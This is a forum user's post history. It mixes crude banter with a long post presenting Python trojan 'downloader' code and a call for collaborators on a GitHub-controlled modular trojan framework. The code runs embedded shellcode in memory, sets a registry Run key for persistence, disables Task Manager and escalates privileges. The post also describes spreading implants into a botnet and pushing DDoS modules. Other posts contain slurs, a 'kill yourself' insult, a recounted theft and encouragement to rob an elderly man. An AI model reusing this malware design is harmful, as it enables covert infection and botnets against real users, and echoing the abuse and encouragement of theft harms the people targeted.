User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 1323
  6. 1324
  7. 1325
  8. 1326
  9. 1327
  10. 1328
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    That's literally the story. This weirdo from the church I went to growing up contacted me, and offered to pay for me to go to the casino and gamble with him (he has/had a major gambling addiction). I played a lot of poker at the time and was broke so I said fuck it, why not. He gave me money, we played poker and table games and I got progressively drunk before we drove back to his place for me to drink more (he was barely drinking). I intended on simply passing out on his couch and leaving in the morning, and then like I said, I told him to 'oh suck my dick' as in something you say to someone who said something weird or stupid, I wasn't literally telling him to suck my dick, but he thought I was or he used it as an opportunity to tell me that he would actually suck my dick, confirming my suspicions that he was indeed a creepy, weird fuck. I was like 22 at the time and he was probably 28 or 29 and he had braces, ha. Like I said I laughed it off and he did too, tried to play it off like he was joking, but it was awkward. He went to bed a short while later and I laid there thinking about how fucked up it was that a grown man just offered to suck my fucking cock, and it made me angry for some reason, and pissed me off to the point where I felt justified in stealing the two thousand dollars (because he's a gambling addict) he had sitting on the desk just inside his room. It was obviously quite clear it was me, and he tried contacting me again the next day. I ignored his calls for a while and eventually talked to him, denying everything, knowing he had no proof. That's the story. I got away with it and haven't spoken to the dude in probably 6 or 7 years. gud tymes :)

    So weird, i never stole 2k, wish i did. That's a lot of money.
  2. Sophie Pedophile Tech Support
    Have you saw?

    no cuz ur pms no arrive
  3. Sophie Pedophile Tech Support
    Noice.
  4. Sophie Pedophile Tech Support
    Your post read like that faggot from RDFRN that was coming into that NSA thread spouting his bullshit about how you have top secret clearance and assorted nonesense. If you're the same person, please kill yourself now, oh and here's something for you as well:

    [SIZE=48px]FUCK THE US GOVERNMENT AND ALL IT'S INSTITUTIONS[/SIZE]

    Allahu akbar motherfucker.
  5. Sophie Pedophile Tech Support
    Uhm, where did you see me calling it a 'government undetectable trojan' whatever that's supposed to mean, read the thread again you unrepentant idiot. By the way, you'll earn the right to tell me i suck when you show me a better version of your own creation. Also, going by your reply, you know nothing of computers so please do us all a favor and stop talking.
  6. Sophie Pedophile Tech Support
    getting drunk with this weird guy from my old church, hazily recall getting mad and telling him to suck my dick and him telling me he would do it and to drop my pants. I laughed it off but it made me quite uncomfortable so I waited til he passed out and stole two thousand dollars from him. Ha.

    lolwut
  7. Sophie Pedophile Tech Support
    I hear Steven Universe is bretty funny.
  8. Sophie Pedophile Tech Support
    Ok so you probably remember this thread http://niggasin.space/forum/technoph...omments-advice so i'm not going to go into what it exactly does. Well, i've been polishing my program making it more fancy and such and i'd like you to review my code. What's more is i plan on integrating gcat functionality into a modular trojan framework as illustrated in this thread:

    http://niggasin.space/forum/technoph...ojan-framework

    Some points to take from this are that github will serve as command and control, allowing me to have implants read in modules on the fly. Say for example i have my implants built and deployed they're going to be checking a JSON file.


    [
    {
    "module" : "dirlister"
    },
    {
    "module" : "environment"
    }
    ]


    Which will tell them which modules to fetch, in this case, dirlister and environment. As opposed to gcat i plan to include multi-platform support in this trojan framework, so i will be needing some Linux/Mac specific modules.

    In any event, here's the new code for the downloader, i'll get into the trojan framework a bit later on.


    import os
    import sys
    import ctypes
    import os.path
    import _winreg
    import pythoncom
    import pywintypes
    import win32api
    import win32com.shell.shell as shell

    # Main function.
    def execute():
    # Download file to path and execute (shellcode example)
    shellcode = bytearray(
    "\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
    "\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
    "\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
    "\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
    "\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
    "\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
    "\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
    "\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
    "\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
    "\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
    "\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
    "\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
    "\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
    "\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
    "\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
    "\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
    "\x5e\xa4\xb4")

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

    # Reg key to run implant at boot
    aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
    aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
    SetValueEx(aKey,"foobar",1, REG_SZ, PATH)
    CloseKey(aKey)

    # Disable task manager for good measure
    aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
    aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE)
    SetValueEx(aKey,"DisableTaskMgr",1, REG_DWORD, 0)
    CloseKey(aKey)


    I decided to have the main operation of the program run as a function, because that's fancy as fuck and allows a greater deal of control. Because i'm going to be efficient and not execute anything that is not necessary.



    if not shell.IsUserAnAdmin():
    # Elevate privilege
    ASADMIN = "asadmin"

    if sys.argv[-1] != ASADMIN:
    script = os.path.abspath(sys.argv[0])
    params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
    shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
    sys.exit(0)


    In the spirit of not executing anything unnecessary, i'm chacking here to see if we already have admin privilege in which case it doesn't make sense to run some escalation logic.


    PATH = "C:\\SomeDir\\example\\implant.exe"

    if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
    sys.exit(0)
    else:
    execute()


    Finally, here i'm checking to see if the shellcode has already executed before and we already have our implant in place, if we do we're simply going to exit and if nor i'm calling the execute() function to have the main operation of the program proceed.

    https://github.com/NullArray/gcat

    [SIZE=48px]Modular Framework Integration[/SIZE]

    So this method of delivery is well suited for use with anything. I have a script that allows me to generate shellcode by my specifications, say we have our trojan uploaded to www.example.com/implant.exe i can simply define so in my script plus the directory it will be downloaded to and it will generate the shellcode i need. The beatuty of the modular framework is that i can add modules to any trojan in the field simply by pushing them to github with Git Bash. Say for example i want to find out what environment i'm in so i can set up a targeted attack, i'll simply run the environment module from my end:


    import os

    def run(**args):
    print "
    [*] In environment module"
    return str(os.version)


    And get my results, it's as simple as that. Say my implant is in a Linux environment, now i can tailor make a new module to be employed in this scenario, push it to github, have my implants integrate it and run it from my end. The sky is the limit. Now to this end i'd like to collaborate on module development and such. What's more, i need a way of uniquely identifying each implant to send and receive data from in order for them to be generated and deployed on the fly. Say for instance we integrate a module that scans the network and automatically migrates to hosts that are up and combine this with the initial method of deployment(By downloader) we'll have a certified botnet in no time. Like i said you can get as creative as you want with this. Need to DDoS a nigga'? No problem just push a DDoS module to github etcetera, now obviously there are things far cooler than DDoS'ing some site but you get the general idea.

    Questions, advice, thoughts comments?
  9. Sophie Pedophile Tech Support
    Thats not true, at least not here in the states. My dad has his bottle stolen and had a police report and everything one time, doctor said sorry your SOL. Also heard the same thing from another lady I knew who got hwr script picked off her in walmart. Another lady was at my doctors office when I was getting my shit and I over heard my doctor tell her she was fucked.

    Fuck American healthcare. Here you can just say: I uhm, misplaced my script can i get a new one? And the doc will be like, lol sure.
  10. Sophie Pedophile Tech Support
    Now that i think of it though it would be pretty cool if we could like just live in a cabin in the woods on a hilltop with the lot of us or whatever and basically just do whatever the fuck we want.
  11. Sophie Pedophile Tech Support
    my most current dream I had about our epicness is Mq and sploo , lanny, sophie, oplus , iron john and even rocklins bitchass pull up in an suv. Iron john shouts out the window "get in Bill Krozby man!"
    I hop in, and we're on our way. Mq has a strong midwestern accident and he's like "wwwwooooh hooo we're gonna drink some beeers smoke cigga weed and blow out some pussys tonight! then we're gonna smoke some speed and start stabbin' the fuck outta eachother!"

    9/10, would participate in daydream again. But nah, not really i never have fantasies about us, sometimes i do dream about the people here but details escape me at the moment. I do fantasize about PieGirl though, mmmmmm.(If you saved pics this is the time to post them)
  12. Sophie Pedophile Tech Support
    Sorry my knowledge on recent American history is a bit lacking. Was it Kennedy? Just a guess.
  13. Sophie Pedophile Tech Support
    Requiem aeternam dona ei, Domine, et lux perpetua luceat ei. Requiescat in pace. Amen
  14. Sophie Pedophile Tech Support
    Ehh, he'd get new patches with a police report and a new script from his doctor. You should have followed him home and waited for his old ass to go to sleep. The old codger might have had some valuables too.

    True, you're a bad influence breh.
  15. Sophie Pedophile Tech Support
    Ho, ho, ho!
  16. Sophie Pedophile Tech Support
    Oh...
  17. Sophie Pedophile Tech Support
    I'm suddenly grinding my teeth SO HARD.

    The lord provides. Did the lord also provide you with antidepressants? If so, do you think he will provide you with relief soon?
  18. Sophie Pedophile Tech Support
    So in Black Hat Python i'm at the part where we'll be building a trojan framework and it's going to be awesome. The gist of it is that you build a trojan, setup a dedicated github as C&C, now here is where it gets interesting. By doing so you allow your implants to read in new modules LIVE by having them check a JSON config file that says which modules they ought to have and then retrieving the actual module directly from github.

    Now i plan on adding all the modules from gcat and then some. I will also need help in writing some code that automatically generates IDs for implants so that i can generate them and deploy them on the fly.

    Daily reminder that gcat is awesome and you should give Sophie stars for his work on the downloader. https://github.com/NullArray/gcat/bl.../downloader.py

    Anyway, i want to collab on this niggers, someone come collab with me and we'll make it epic. Maybe we can even pool some resources buy a private github repo and proceed with world domination. Who's with me?
  19. Sophie Pedophile Tech Support
    Sometimes I get tired of understanding everything and not having the verbal fortitude to explain my position, ergo, the ambition to type out lengthy diatribes regarding how I really feel. I'm just so…..lazy. I need to become manic again or get back into meth, otherwise the trend will continue. SO SAD.

    Hopefully you'll become manic soon mQ-senpai, i'll pray to Jesus for you.
  20. Sophie Pedophile Tech Support
    Beautiful artistry.
  1. 1
  2. 2
  3. 3
  4. ...
  5. 1323
  6. 1324
  7. 1325
  8. 1326
  9. 1327
  10. 1328
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top